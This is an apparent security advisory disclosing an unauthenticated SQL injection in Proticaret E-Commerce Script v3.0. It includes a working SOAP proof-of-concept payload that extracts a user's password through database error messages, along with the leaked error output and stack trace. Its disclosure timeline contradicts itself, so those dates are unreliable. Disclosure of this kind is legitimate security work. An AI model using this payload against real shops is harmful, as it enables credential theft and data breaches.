Proticaret E-Commerce Script 3.0 - SQL Injection Vulnerability

ID 1337DAY-ID-22885
Type zdt
Reporter Onur Alanbel
Modified 2014-11-17T00:00:00


Proticaret E-Commerce Script version 3.0 suffers from a remote SQL injection vulnerability.

                                            Document Title:
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
13 Nov 2014
Product & Service Introduction:
Proticaret is a free e-commerce script.
Abstract Advisory Information:
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
Vulnerability Disclosure Timeline:
20 Oct 2014 :   Contact with Vendor
20 Nov 2014 :   Vendor Response
June 26, 2014   :   Patch Released
13 Nov 2014 :   Public Disclosure
Discovery Status:
Affected Product(s):
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
Remote, Unauthenticated
Severity Level:
Technical Details & Description:
SQL Injection
Proof of Concept (PoC):
Proof of Concept
<soapenv:Envelope xmlns:soapenv="" xmlns:tem="">
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-  -</tem:Code>
<soap:Envelope xmlns:soap="" xmlns:xsi="" xmlns:xsd="">
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
Solution Fix & Patch:
Apply the patch for v3.0
Security Risk:
The risk of the vulnerabilities above estimated as critical.
Credits & Authors:
Bilgi Güvenliği Akademisi
Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

# [2018-01-05]  #